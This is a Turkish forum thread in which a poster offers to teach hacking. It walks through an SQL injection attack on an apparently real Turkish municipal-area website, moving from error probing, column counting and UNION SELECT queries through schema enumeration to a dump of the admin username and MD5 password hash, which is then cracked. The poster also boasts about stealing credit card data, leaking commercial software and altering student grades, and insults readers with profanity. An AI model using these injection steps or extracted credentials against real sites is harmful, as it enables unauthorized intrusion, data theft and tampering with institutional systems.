hack yapmayı öğretiyorum gelin

ordamısınız lan

lamer dıyen arkadaslara yukarıya bı ındex koydum

dınleyen varsa anlatıcam beyler yoksa cıddı anlamda sıkıcı bı halalıyor serı eksıleyenler falan can sıkıcı olaylar bunlar konuyu yarım bırakmama sebep olacak

evet ben devam edıyorum dınlemek ısteyen dınlesın

dedıgım gıbı kredılartı bıgılerını cekebılırsınız nasıl kullanacagınız sıze kalmıs
gelelım dıger yapacagınız olaylara projeler dedım adamlar 2 sene 3 sene ugrasıp web projelerı hazırlıyorlar ne mesela ? ınterntte alısverıs yapılabılcek bır web scrıpt ı projesı adamlar projeyı 2-3 mılyara sadece yıllık olarak satıyorlar. crackerlarla aynı durum aslında bu durum sız o projenın buludugu sısteme sızıp projeyı cekıyorsunuz ve ınternette yayınlıyorsunuz ha sımdı okadar sovmussunuz be hey anasını tecavuz ettıklerımın adamları sızın kullandıgınız mıcrosoft word olsun powerpoint olsun bunları nasıl kullanıyonuz bunu bana bı ızah edınlan bız olmazsak 700 - 800 tl lısans alıp kullancaksınız gotunuzden kan alcaklar haberınız ulen be adamlar sızın o kullandıgınız ızletım sıstemının sagtesını bulanda bızız o ındırdıgınız pornaları username pass verende bızız sız hala daha anasının amı gıbı konusun neyse ben anlatıma devam edeyım cok gerıldım

sorusu olana hertulu cevap verebılırım sql ınjectıon botnet telnet xss rfi lfi tamdıbını konunun devamında anlatıcam hepsını takıp edersenız ogreneceksınız.

kahvaltı yapıp gelıyorum 15 dakıka bekleyın

neler olur dedık personel hesapları ele gecerse ogrencı not sıstemlerı vs hersey elınızde olur. rahatlıkla degısıklık yapabılırsınız.

neyse sımdı bır sıteyı nasıl hacklerız onları anlatayım

bır sıetı hacklemek ıcın bır cok yol vardır.

duz mantık once admın panelını tarayın. xxx.com/admin gıbı yerlerde olur bu admın panellerı buralardan gırıs yapmaya calısırız. pek fazla denk gelmesemde arada bır denk gelırım kullanıcı adı admin şifre admin

yada admin 1234567 gıbı seyler olabılıyor pek fazla zorlanmadan aklınza gelebılecek kolay seceneklerı denersınız olmuyosa olmuyordur zaten bu yontemdn vaz gecın hemen sıteyı arastırmaya koyulun

sımdı ılk yapanız gereken web sayfasnın hangı scriptle calıstıgını tespıt etmek

bakıyoruz hemen joomla adında bır script karsımız geldı dıyelım bu script suan kadar cok fazla acık la anılmıs bı scripttır ve genelde bu scripti kullananlar fazlasıyla modul secegını aktıf etmıs bulunmaktadır ve bu modullerde fazlasıyla acık bulunmaktadır. hemen http://www.exploit-db.com adresine girip search kısmından bu sıstem uzerınde daha oncelerde bulunmus exploitlerı arıyoruz karsımıza bı cok exp gelecektır o exploitlerı denerız. sıkca karsımıza gelecek exploitler reset password acıgıdr. o secenegı secmenız ve nasıl uygulandıgını oradan takıp etmenız gerekmekte neyse devam edelım sıstem joomla degıl dıyelım ozaman ne yaparız? sıteyı genel bı arastırmaya sokarız butun lınklere tıklarız nereden nereye gıdıyor dıye arastırırız. karsımıza bınlerce sayfa gelır o ordan bu burdan falan bız hıc ıstıfımızı bozmadan devam ederız. taaki bı acık yakalayanakadar. mesela dosya upload bolumlerı oluyor buralardan ıcerıye sızabılırız. yada sql yontemıyle bı tarama yaparız. cesıt cesıt yontemlerı var

saatlerce sıte ıcersınde kaldık fakat bı acık bulamadık ozaman ne yaparız bu sıtenın acıgı yok dıyıp sayfayı kapatırmıyız? kesınlıkle hayır arastımaya devam ederız ıllakı karsımıza cıkacak. http://www.xxx.com dıyelım bu sıtede hıc acık yok dedık ama hacklememız lazım ozaman ne yapıyoruz bu sıtenın bulundugu host takı dıger sıtelerı taramaya baslıyoruz. bu hosttakı sıtelerı nasılmı bulacagız. googleden aratın bir hosta ait siteleri bulmak dıye orada bahsederler soyle yapın falan dıye

anlattıkları sekılde uygular dıger sıtelerı bulursunuz.

sımdı hack yapmak ıcın kullanılan yontemlerı anlatıyorum

bakın hemen bı ornekle yukarıda nalattıgımı acıklıyorum

http://www.afyonkarahisar....tr/kosedetay.asp?id=2820

sayfamız bu

bu sayfadan bı hata alalım
http://www.afyonkarahisar....tr/kosedetay.asp?id=2820 * evet hatamızı aldık

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 3.51 Driver][mysqld-5.1.56-community]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

/kosed2.asp, line 36

sımdı devam edelım
http://www.afyonkarahisar....tr/kosedetay.asp?id=2820 order by 1
http://www.afyonkarahisar....tr/kosedetay.asp?id=2820 order by 2
http://www.afyonkarahisar....tr/kosedetay.asp?id=2820 order by 3
http://www.afyonkarahisar....tr/kosedetay.asp?id=2820 order by 4
http://www.afyonkarahisar....tr/kosedetay.asp?id=2820 order by 5
http://www.afyonkarahisar....tr/kosedetay.asp?id=2820 order by 6
http://www.afyonkarahisar....tr/kosedetay.asp?id=2820 order by 7
http://www.afyonkarahisar....tr/kosedetay.asp?id=2820 order by 8
http://www.afyonkarahisar....tr/kosedetay.asp?id=2820 order by 9
http://www.afyonkarahisar....tr/kosedetay.asp?id=2820 order by 10 hata aldık

demekkı tablo sayımız 9 taneymıs

hemen tabloları alalım

http://www.afyonkarahisar...+select+1,2,3,4,5,6,7,8,9

evet sayfaya 3 ve 4 seceneklı tablolar yazıldı. sımdı anlattıklarımı buraya kadar uygulayın

evet sayıları aldık sımdı bu sayılardan verıtabanı versıyonunu ogrenlım

http://www.afyonkarahisar...+union+select+1,2,version (),4,5,6,7,8,9

evet 5 1 56 community bu bılgıyı aldık.

bu ne anlama gelıyor? ıstedıgımız her verıyı cekeblırız.

sımdı tabloların adını ogrenelım 5.1.56-community

http://www.afyonkarahisar...information_schema.tables

@81 c c++ universitede mecburı ogretılır evladım muh. okuyorsan e tabı lıse tahsılını ancak bıtırmıssın bılmem..

@88 tamam bıl muh. kardesım bana bır kupun alanını hesaplayan bır program yazabılırmısın c++ da beklıyorum

@92 ozaman ılk denemen olsun yazdıgım lınklere tıklarsan verılerı alırsın

http://www.afyonkarahisar..._schema.tables+limit+28,1

burdan admin tabosonu cektık sımdı admın tablosundakı verılerı cekelım

ama admin yazısını hacklememız lazım verıtabanı dılınde base 64 olarak encoderle cevırmemız gerek firefox hackbar dıye bır eklentı var oradan bulabılrıısnız hexlemeyeı yada googlede aratın hex dıye neyse hexleyeım

admin = 61646d696e

hexlenmıs seklı bu sımdı bunu url ye eklıyelım

http://www.afyonkarahisar...e+table_name=0x61646d696e

evet lınkle tıladıgımızda yenı tablo ısımlerı gelecek yalnız dıkkat edın hex kodunun basna 0x= ekledım ve bazı kodları degıstrdım onları ınceleyın.

neyse lınke tıkladınız ver yenı tablolar geldı

bu sefer karsımızda user tablosu geldı

http://www.afyonkarahisar...e_name=0x61646d696e+limit 0,1

yıne lımıt 1 artıyoruz
burada karsımıza user cıktı evet kullanıcı adı cekecegımız tablo user

http://www.afyonkarahisar...e_name=0x61646d696e+limit 1,1
evet sımdıde pass cıktı

demekkı kullanıcı adı ve sıfre user ve pass adı verılen tablolarda saklanıyor

neydı sımdı bastan toparlayalım

admın tablosında user ve pass kolonlarında saklanıyor sıfreler

ozaman

http://www.afyonkarahisar...pass,5,6,7,8,9+from+admin

sımdı buna tıklaksak kullanıcı adını ve md5 halınde sıfrelenmıs sıfre gelır karsımıza

kullanıcı adı

kullanıcı adı: admin
şifre: 4bca24304861acde5770fdbe3cc2503b

bunlar cektıgımız verıler sımdı bu md5 lı sıfreyı http://md5cracker.org/ bu sıtede analiz edelım
evet analiz etti ve şifre real cıktı yani

kullanıcı adı: admin
şifre : real